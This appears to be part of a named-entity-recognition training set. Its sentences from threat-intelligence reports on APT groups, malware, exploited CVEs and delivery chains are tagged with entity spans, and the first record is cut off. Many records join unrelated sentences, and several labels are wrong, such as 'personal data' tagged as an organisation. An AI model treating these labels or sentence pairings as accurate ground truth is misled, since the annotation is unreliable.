Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": {"THREAT_ACTOR: Scattered Canary": [[170, 186]], "THREAT_ACTOR: HIDDEN COBRA actors": [[320, 339]], "MALWARE: DDoS botnets": [[348, 360]], "MALWARE: keyloggers": [[363, 373]], "MALWARE: remote access tools": [[376, 395]], "MALWARE: RATs": [[398, 402]], "MALWARE: wiper": [[411, 416]], "MALWARE: malware": [[417, 424]]}, "info": {"id": "cyberner_stix_train_001122", "source": "cyberner_stix_train"}} {"text": "The tools and malware used in this breach were also signed with stolen digital certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_001123", "source": "cyberner_stix_train"}} {"text": "There are a lot of other ‘ Negg ’ mentions in Whois records and references to it . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server . 
We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command .", "spans": {"THREAT_ACTOR: SEDNIT-related": [[107, 121]], "ORGANIZATION: personal data": [[142, 155]], "THREAT_ACTOR: admin@338": [[269, 278]], "MALWARE: BUBBLEWRAP": [[320, 330]], "MALWARE: Backdoor.APT.FakeWinHTTPHelper": [[347, 377]], "TOOL: Dropbox": [[389, 396]]}, "info": {"id": "cyberner_stix_train_001124", "source": "cyberner_stix_train"}} {"text": "In this campaign , attackers used a Microsoft Word document called 0721.doc , which exploits CVE-2017-0199 .", "spans": {"ORGANIZATION: Microsoft": [[36, 45]], "TOOL: Word": [[46, 50]], "FILEPATH: 0721.doc": [[67, 75]], "VULNERABILITY: CVE-2017-0199": [[93, 106]]}, "info": {"id": "cyberner_stix_train_001125", "source": "cyberner_stix_train"}} {"text": "In April 2015 , alleged pro-ISIS hacktivist group CyberCaliphate defaced TV5Monde ’s websites and social media profiles and forced the company ’s 11 broadcast channels offline .", "spans": {"THREAT_ACTOR: CyberCaliphate": [[50, 64]], "ORGANIZATION: TV5Monde": [[73, 81]]}, "info": {"id": "cyberner_stix_train_001126", "source": "cyberner_stix_train"}} {"text": "The credentials were immediately available in the leaky database – see Figure 6 . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"THREAT_ACTOR: Turla": [[126, 131]], "FILEPATH: IOC files": [[250, 259]], "THREAT_ACTOR: HIDDEN COBRA": [[268, 280]], "MALWARE: FALLCHILL": [[303, 312]]}, "info": {"id": "cyberner_stix_train_001127", "source": "cyberner_stix_train"}} {"text": "Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28 . 
Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": {"ORGANIZATION: domain hosting company": [[45, 67]], "THREAT_ACTOR: APT28": [[154, 159]], "VULNERABILITY: CVE-2017-1099": [[233, 246]], "TOOL: RTF": [[262, 265]]}, "info": {"id": "cyberner_stix_train_001128", "source": "cyberner_stix_train"}} {"text": "AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"TOOL: ServHelper": [[30, 40]], "TOOL: FlawedAmmy": [[45, 55]], "THREAT_ACTOR: SectorJ04": [[72, 81]], "VULNERABILITY: exploit": [[190, 197]], "VULNERABILITY: CVE2017-11882": [[198, 211]], "TOOL: HTML Application": [[242, 258]], "TOOL: HTA": [[261, 264]], "TOOL: Visual Basic": [[291, 303]], "TOOL: VBS": [[306, 309]], "FILEPATH: mshta.exe": [[394, 403]]}, "info": {"id": "cyberner_stix_train_001129", "source": "cyberner_stix_train"}} {"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . Execute a command through exploits for CVE-2018-0802 .", "spans": {"VULNERABILITY: CVE-2015-2546": [[8, 21]], "THREAT_ACTOR: attackers": [[168, 177]], "VULNERABILITY: CVE-2018-0802": [[219, 232]]}, "info": {"id": "cyberner_stix_train_001130", "source": "cyberner_stix_train"}} {"text": "VICTIMOLOGY ON THE IDENTIFIED CAMPAIGNS The campaigns we analyzed targeted Android devices in Thailand . 
The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" . To date , we have seen several custom Base64 alphabets , including : +NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA , HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we mKckJLBofCDrs9VtWXlEu , p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ zPgUx67FMhYb8q3wemKc , aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"SYSTEM: Android": [[75, 82]], "ORGANIZATION: CSP": [[820, 823]], "TOOL: browser": [[862, 869]], "SYSTEM: URL": [[921, 924]]}, "info": {"id": "cyberner_stix_train_001131", "source": "cyberner_stix_train"}} {"text": "Their targets have also included the governments of members of the Commonwealth of Independent States ; Asian , African , and Middle Eastern governments ; organizations associated with Chechen extremism ; and Russian speakers engaged in the illicit trade of controlled substances and drugs .", "spans": {"ORGANIZATION: Commonwealth of Independent States": [[67, 101]]}, "info": {"id": "cyberner_stix_train_001132", "source": "cyberner_stix_train"}} {"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . 
Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan .", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: APT32": [[43, 48]], "ORGANIZATION: foreign corporations": [[59, 79]], "ORGANIZATION: manufacturing": [[117, 130]], "ORGANIZATION: consumer products": [[133, 150]], "ORGANIZATION: hospitality sectors": [[157, 176]], "THREAT_ACTOR: Icefog": [[179, 185]], "THREAT_ACTOR: Dagger Panda": [[208, 220]], "ORGANIZATION: Crowdstrike": [[226, 237]]}, "info": {"id": "cyberner_stix_train_001133", "source": "cyberner_stix_train"}} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers first infected in March 2017 .", "spans": {"TOOL: POWRUNER": [[0, 8]], "MALWARE: RTF file": [[41, 49]], "VULNERABILITY: CVE-2017-0199": [[65, 78]]}, "info": {"id": "cyberner_stix_train_001134", "source": "cyberner_stix_train"}} {"text": "The majority of samples analyzed to date were submitted no earlier than mid-October , with most being submitted in January 2017 or later .", "spans": {}, "info": {"id": "cyberner_stix_train_001135", "source": "cyberner_stix_train"}} {"text": "However , a simple Google search for the adware package name returned a “ TestDelete ” project that had been available in his repository at some point The malicious developer also has apps in Apple ’ s App Store . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . 
Filename: conhote.dll .", "spans": {"ORGANIZATION: Google": [[19, 25]], "ORGANIZATION: Apple": [[192, 197]], "SYSTEM: App Store": [[202, 211]], "MALWARE: malware": [[218, 225]], "MALWARE: file": [[265, 269]], "MALWARE: C:\\WINDOWS\\tasksche.exe": [[270, 293]], "FILEPATH: conhote.dll": [[306, 317]]}, "info": {"id": "cyberner_stix_train_001136", "source": "cyberner_stix_train"}} {"text": "After the initial compromise , TG-3390 delivers the HttpBrowser backdoor to its victims .", "spans": {"THREAT_ACTOR: TG-3390": [[31, 38]], "MALWARE: HttpBrowser backdoor": [[52, 72]]}, "info": {"id": "cyberner_stix_train_001137", "source": "cyberner_stix_train"}} {"text": "The phishing pages shown in the overlay use Ajax calls to communicate with a PHP back-end which stores all user input . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research . BlackOasis in recent months sent a wave of phishing emails . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": {"ORGANIZATION: Kaspersky Lab": [[174, 187]], "THREAT_ACTOR: BlackOasis": [[217, 227]], "TOOL: emails": [[269, 275]], "THREAT_ACTOR: APT33": [[278, 283]]}, "info": {"id": "cyberner_stix_train_001138", "source": "cyberner_stix_train"}} {"text": "EventBot mobile banking applications targetedApplications targeted by EventBot . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . 
Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": {"MALWARE: EventBot": [[0, 8], [70, 78]], "MALWARE: .lnk file": [[134, 143]], "THREAT_ACTOR: Lotus Blossom": [[275, 288]], "VULNERABILITY: exploit": [[302, 309]], "VULNERABILITY: CVE-2014-6332": [[310, 323]]}, "info": {"id": "cyberner_stix_train_001139", "source": "cyberner_stix_train"}} {"text": "MALWARE UNDER ACTIVE DEVELOPMENT EventBot “ cfg ” class EventBot “ cfg ” class . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) .", "spans": {"MALWARE: EventBot": [[33, 41], [56, 64]], "MALWARE: Batmobi": [[187, 194]], "MALWARE: Duapps": [[197, 203]], "MALWARE: Cheetah SDK": [[222, 233]], "ORGANIZATION: CTU": [[236, 239]], "THREAT_ACTOR: actors": [[301, 307]], "THREAT_ACTOR: COBALT GYPSY": [[356, 368]], "THREAT_ACTOR: Threat Group-2889": [[401, 418]]}, "info": {"id": "cyberner_stix_train_001141", "source": "cyberner_stix_train"}} {"text": "The threat actors behind this attack demonstrated some interesting techniques , including :", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]]}, "info": {"id": "cyberner_stix_train_001142", "source": "cyberner_stix_train"}} {"text": "The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors .", "spans": {"MALWARE: Shamoon2": [[74, 82]]}, "info": {"id": "cyberner_stix_train_001143", "source": "cyberner_stix_train"}} {"text": "The c2 domain ( khanji.ddns.net ) was also found to be associated with multiple malware samples in the past , Some of these malware samples made connection to pastebin urls upon execution , which is similar to the behavior mentioned 
previously .", "spans": {"TOOL: c2": [[4, 6]], "DOMAIN: khanji.ddns.net": [[16, 31]], "TOOL: pastebin": [[159, 167]]}, "info": {"id": "cyberner_stix_train_001144", "source": "cyberner_stix_train"}} {"text": "Many of the functionalities seen in this spyware are similar to Spynote and Spymax based on the samples we analyzed with some modifications . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . NEODYMIUM is reportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"MALWARE: Spynote": [[64, 71]], "MALWARE: Spymax": [[76, 82]], "ORGANIZATION: Symantec": [[196, 204]], "THREAT_ACTOR: Buckeye": [[244, 251]], "THREAT_ACTOR: NEODYMIUM": [[267, 276]], "THREAT_ACTOR: BlackOasis": [[315, 325]]}, "info": {"id": "cyberner_stix_train_001145", "source": "cyberner_stix_train"}} {"text": "We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": {"THREAT_ACTOR: Suckfly": [[16, 23], [180, 187]]}, "info": {"id": "cyberner_stix_train_001146", "source": "cyberner_stix_train"}} {"text": "These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . 
One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software .", "spans": {"THREAT_ACTOR: threat groups": [[37, 50]], "VULNERABILITY: CVE-2018-0798": [[103, 116]], "MALWARE: legitimate software": [[402, 421]]}, "info": {"id": "cyberner_stix_train_001147", "source": "cyberner_stix_train"}} {"text": "They use At.exe to schedule tasks to run self-extracting RAR archives , which install either HttpBrowser or PlugX .", "spans": {"FILEPATH: At.exe": [[9, 15]], "TOOL: RAR": [[57, 60]], "MALWARE: HttpBrowser": [[93, 104]], "MALWARE: PlugX": [[108, 113]]}, "info": {"id": "cyberner_stix_train_001148", "source": "cyberner_stix_train"}} {"text": "These cyber operations have included spear phishing campaigns targeting government organizations , critical infrastructure entities , think tanks , universities , political organizations , and corporations , leading to the theft of information .", "spans": {}, "info": {"id": "cyberner_stix_train_001149", "source": "cyberner_stix_train"}} {"text": "Structure of data sent to the server : To begin with , the Trojan sends information about the device to the server : In response , the server sends the code of the command for execution ( “ command ” ) , its parameters ( “ params ” ) , and the time delay before execution ( “ waitrun ” in milliseconds ) . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . It remains unclear whether these are leftover code from the previous versions or their particular purposes were served . 
As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": {"VULNERABILITY: CVE-2011-3544": [[355, 368]], "TOOL: HTTPBrowser backdoor": [[436, 456]], "VULNERABILITY: CVE-2010-0738": [[463, 476]], "TOOL: JBoss": [[498, 503]], "ORGANIZATION: Cisco Talos": [[774, 785]], "ORGANIZATION: cybersecurity professionals": [[905, 932]]}, "info": {"id": "cyberner_stix_train_001150", "source": "cyberner_stix_train"}} {"text": "FireEye products have robust detection for the malware used in this campaign . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[89, 94]], "FILEPATH: Vietnam.exe": [[193, 204]], "ORGANIZATION: diaspora": [[264, 272]]}, "info": {"id": "cyberner_stix_train_001151", "source": "cyberner_stix_train"}} {"text": "It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have .", "spans": {}, "info": {"id": "cyberner_stix_train_001152", "source": "cyberner_stix_train"}} {"text": "The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . These images were associated with the Bookworm campaign code \" 20150905 \" .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "cyberner_stix_train_001153", "source": "cyberner_stix_train"}} {"text": "Malicious codes are embedded in apps that the operators repackaged from legitimate applications . 
Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . FIN7.5 : the infamous cybercrime rig FIN7 continues its activities . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": {"THREAT_ACTOR: FIN7.5": [[306, 312]], "THREAT_ACTOR: FIN7": [[343, 347]], "ORGANIZATION: antivirus provider": [[572, 590]], "ORGANIZATION: Kaspersky Lab": [[591, 604]]}, "info": {"id": "cyberner_stix_train_001154", "source": "cyberner_stix_train"}} {"text": "The following list of documents included :", "spans": {}, "info": {"id": "cyberner_stix_train_001155", "source": "cyberner_stix_train"}} {"text": "Check Point Research has submitted data to Google and law enforcement units to facilitate further investigation . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand . Their targets , however , appear to be individuals that do not share common affiliations. ” Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[43, 49]], "ORGANIZATION: Unit 42": [[114, 121]], "TOOL: Bookworm samples": [[181, 197]], "ORGANIZATION: government": [[266, 276]], "MALWARE: TrickBot": [[401, 409]]}, "info": {"id": "cyberner_stix_train_001156", "source": "cyberner_stix_train"}} {"text": "Based on this JSON reply , the app looks for an HTML snippet that corresponds to the active element ( show_hide btnnext ) and , if found , the Javascript snippet tries to perform a click ( ) method on it . 
Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications . As corporate networks become more secure and users become more vigilant , personal accounts can still offer a means to bypass security systems . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": {"ORGANIZATION: space exploration": [[310, 327]], "ORGANIZATION: nanotechnology": [[330, 344]], "ORGANIZATION: energy production": [[347, 364]], "ORGANIZATION: nuclear power": [[367, 380]], "ORGANIZATION: lasers": [[383, 389]], "ORGANIZATION: medicine": [[392, 400]], "ORGANIZATION: communications": [[405, 419]], "ORGANIZATION: Apple": [[567, 572]], "SYSTEM: iPhones": [[628, 635]], "SYSTEM: iPads": [[640, 645]], "VULNERABILITY: CVE-2023 - 37450": [[664, 680]], "SYSTEM: the WebKit browser": [[724, 742]], "TOOL: Safari": [[755, 761]], "SYSTEM: web browsers": [[772, 784]]}, "info": {"id": "cyberner_stix_train_001157", "source": "cyberner_stix_train"}} {"text": "Read our report , APT37 (Reaper): The Overlooked North Korean Actor , to learn more about our assessment that this threat actor is working on behalf of the North Korean government , as well as various other details about their operations . 
Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before .", "spans": {"THREAT_ACTOR: APT37": [[18, 23]], "ORGANIZATION: North Korean government": [[156, 179]], "FILEPATH: Ploutus": [[295, 302]]}, "info": {"id": "cyberner_stix_train_001158", "source": "cyberner_stix_train"}} {"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . The threat actors have continually used Flash Player installers and Flash slideshows for decoys .", "spans": {"TOOL: Equation Editor": [[36, 51]], "MALWARE: EQNEDT32.EXE": [[54, 66]], "MALWARE: Flash Player installers": [[203, 226]], "MALWARE: Flash slideshows": [[231, 247]]}, "info": {"id": "cyberner_stix_train_001159", "source": "cyberner_stix_train"}} {"text": "testproj.exe dropped benign decoy files and started malicious executables .", "spans": {"FILEPATH: testproj.exe": [[0, 12]]}, "info": {"id": "cyberner_stix_train_001160", "source": "cyberner_stix_train"}} {"text": "The approach of separating malicious functionality out into separate stages that are later downloaded during execution and not present in the initial app published to the Google Play Store , combined with social engineering delivered via social media platforms like Facebook , requires minimal investment in comparison to premium tooling like Pegasus or FinFisher . To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry . In a recent wave of attacks during February 2019 , Elfin attempted to exploit a known vulnerability ( CVE-2018-20250 ) in WinRAR , the widely used file archiving and compression utility capable of creating self-extracting archive files . 
As we ’ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": {"SYSTEM: Google Play Store": [[171, 188]], "ORGANIZATION: Facebook": [[266, 274]], "MALWARE: Pegasus": [[343, 350]], "MALWARE: FinFisher": [[354, 363]], "THREAT_ACTOR: Lazarus group": [[380, 393]], "ORGANIZATION: financial industry": [[478, 496]], "THREAT_ACTOR: Elfin": [[550, 555]], "VULNERABILITY: CVE-2018-20250": [[601, 615]], "TOOL: WinRAR": [[621, 627]]}, "info": {"id": "cyberner_stix_train_001161", "source": "cyberner_stix_train"}} {"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive—or even destructive—event .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[55, 62]], "ORGANIZATION: Dragos": [[165, 171]], "THREAT_ACTOR: XENOTIME": [[211, 219]]}, "info": {"id": "cyberner_stix_train_001162", "source": "cyberner_stix_train"}} {"text": "It can turn off “ VerifyApps ” and enable the installation of apps from 3rd party stores by changing system settings . That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date . Since 2004 , Mandiant has investigated computer security breaches at hundreds of organizations around the world.The majority of these security breaches are attributed to advanced threat actors referred to as the “ Advanced Persistent Threat ” ( APT ) . 
These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": {"ORGANIZATION: security firm": [[157, 170]], "ORGANIZATION: CrowdStrike": [[171, 182]], "ORGANIZATION: Mandiant": [[318, 326]]}, "info": {"id": "cyberner_stix_train_001163", "source": "cyberner_stix_train"}} {"text": "They decrypt several archive files from the assets folder of the installation package , and launch an executable file from them with the name “ start. ” The interesting thing is that the Trojan supports even the 64-bit version of Android , which is very rare . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia . According to the relevant underground forums and messaging groups , these criminals also infect front desk machines in order to capture credentials from the hotel administration software ; they can then steal credit card details from it too . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"SYSTEM: Android": [[230, 237]]}, "info": {"id": "cyberner_stix_train_001164", "source": "cyberner_stix_train"}} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "FILEPATH: exploit code": [[174, 186]]}, "info": {"id": "cyberner_stix_train_001165", "source": "cyberner_stix_train"}} {"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": {"MALWARE: document files": [[4, 18]], "VULNERABILITY: vulnerabilities": [[48, 63]], "MALWARE: Tran Duy Linh": [[168, 181]], "VULNERABILITY: CVE-2012-0158": [[184, 197]], "VULNERABILITY: exploit": [[198, 205]]}, "info": {"id": "cyberner_stix_train_001166", "source": "cyberner_stix_train"}} {"text": "During the investigation , Talos was also able to determine that the same infrastructure has been used to deploy similar campaigns using different versions of the malware . Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims . OceanLotus : worker.baraeme.com:8531 11b4 . 
The UK ’s National Cyber Security Centre ( NCSC ) assesses that the Russian Military Intelligence was almost certainly involved in the 13 January defacements of Ukrainian government websites and the deployment of Whispergate destructive malware .", "spans": {"ORGANIZATION: Talos": [[27, 32]], "ORGANIZATION: MSPs": [[214, 218]], "THREAT_ACTOR: APT10": [[231, 236]], "TOOL: MSP": [[260, 263]], "THREAT_ACTOR: OceanLotus": [[409, 419]], "DOMAIN: worker.baraeme.com:8531": [[422, 445]], "ORGANIZATION: UK ’s National Cyber Security Centre ( NCSC )": [[457, 502]], "THREAT_ACTOR: the Russian Military Intelligence": [[517, 550]], "ORGANIZATION: Ukrainian government websites": [[614, 643]], "MALWARE: Whispergate destructive malware": [[666, 697]]}, "info": {"id": "cyberner_stix_train_001167", "source": "cyberner_stix_train"}} {"text": "However , Ryuk is only used by GRIM SPIDER and , unlike Hermes , Ryuk has only been used to target enterprise environments . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes .", "spans": {"TOOL: Ryuk": [[10, 14], [65, 69]], "TOOL: Hermes": [[56, 62]]}, "info": {"id": "cyberner_stix_train_001168", "source": "cyberner_stix_train"}} {"text": "We expect this list to grow given that this actor has changed its infrastructure numerous times in 2017 . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We have observed 767 separate instances in which APT1 intruders used the publicly available “ HUC Packet Transmit Tool ” or HTRAN on a hop . 
Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": {"VULNERABILITY: CVE-2012-0158": [[187, 200]], "THREAT_ACTOR: APT1": [[282, 286]], "TOOL: HUC Packet Transmit Tool": [[327, 351]], "TOOL: HTRAN": [[357, 362]], "TOOL: Greatness": [[374, 383]], "SYSTEM: IP filtering": [[512, 524]], "SYSTEM: Telegram bots": [[546, 559]]}, "info": {"id": "cyberner_stix_train_001169", "source": "cyberner_stix_train"}} {"text": "The instances we observed , however , used the DDE exploit to deliver different payloads than what was observed previously .", "spans": {}, "info": {"id": "cyberner_stix_train_001170", "source": "cyberner_stix_train"}} {"text": "There have been numerous reports of hTran being used by different Chinese threat actors , including : APT3 , APT27 and DragonOK . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"TOOL: hTran": [[36, 41]], "THREAT_ACTOR: threat actors": [[74, 87]], "THREAT_ACTOR: APT3": [[102, 106]], "THREAT_ACTOR: APT27": [[109, 114]], "THREAT_ACTOR: DragonOK": [[119, 127]], "ORGANIZATION: citizens": [[201, 209]]}, "info": {"id": "cyberner_stix_train_001171", "source": "cyberner_stix_train"}} {"text": "In this figure we have 11 RuMMS samples , all of which were hosted on the website as shown in the “ y ” axis . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . The second document from the beginning of January is named \" fb.docx \" and contains usernames and passwords from an alleged \" Facebook \" leak . 
This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": {"MALWARE: RuMMS": [[26, 31]], "THREAT_ACTOR: threat group": [[116, 128]], "ORGANIZATION: financial": [[202, 211]], "ORGANIZATION: government": [[214, 224]], "ORGANIZATION: energy": [[227, 233]], "ORGANIZATION: chemical": [[236, 244]], "ORGANIZATION: telecommunications": [[251, 269]], "FILEPATH: fb.docx": [[333, 340]], "TOOL: Facebook": [[398, 406]]}, "info": {"id": "cyberner_stix_train_001172", "source": "cyberner_stix_train"}} {"text": "The following scenario may play out : according to the templates for processing incoming SMSs , Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"MALWARE: Rotexy": [[96, 102]], "TOOL: Bookworm": [[265, 273]], "MALWARE: decoys documents": [[360, 376]], "TOOL: dynamic DNS domain": [[405, 423]], "FILEPATH: documents": [[516, 525]], "VULNERABILITY: CVE-2017-0199": [[536, 549]]}, "info": {"id": "cyberner_stix_train_001173", "source": "cyberner_stix_train"}} {"text": "The result is a large online population who have been the subject of numerous cyber-attacks in the past . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . 
In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"MALWARE: TajMahal": [[125, 133]], "ORGANIZATION: Kaspersky": [[168, 177]], "ORGANIZATION: government": [[348, 358]], "ORGANIZATION: think tank": [[401, 411]]}, "info": {"id": "cyberner_stix_train_001174", "source": "cyberner_stix_train"}} {"text": "Exodus : New Android Spyware Made in Italy Mar 29 Summary We identified a new Android spyware platform we named Exodus , which is composed of two stages we call Exodus One and Exodus Two . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 . It uses minimal obfuscation applied only on variables and function naming . In terms of the fallout , it ’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": {"MALWARE: Exodus": [[0, 6], [112, 118]], "SYSTEM: Android": [[13, 20], [78, 85]], "MALWARE: Exodus One": [[161, 171]], "MALWARE: Exodus Two": [[176, 186]], "ORGANIZATION: financial": [[226, 235]], "ORGANIZATION: energy": [[238, 244]], "ORGANIZATION: government organizations": [[249, 273]], "ORGANIZATION: FireEye": [[280, 287]], "THREAT_ACTOR: APT34": [[342, 347]], "THREAT_ACTOR: Cl0p": [[487, 491]]}, "info": {"id": "cyberner_stix_train_001175", "source": "cyberner_stix_train"}} {"text": "There are connections between a subset of the group's operational infrastructure and PRC-based Internet service providers .", "spans": {"ORGANIZATION: PRC-based": [[85, 94]]}, "info": {"id": "cyberner_stix_train_001176", "source": "cyberner_stix_train"}} {"text": "This trojan 's design and implementation is of an uncommonly high level , making it a dangerous threat . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . 
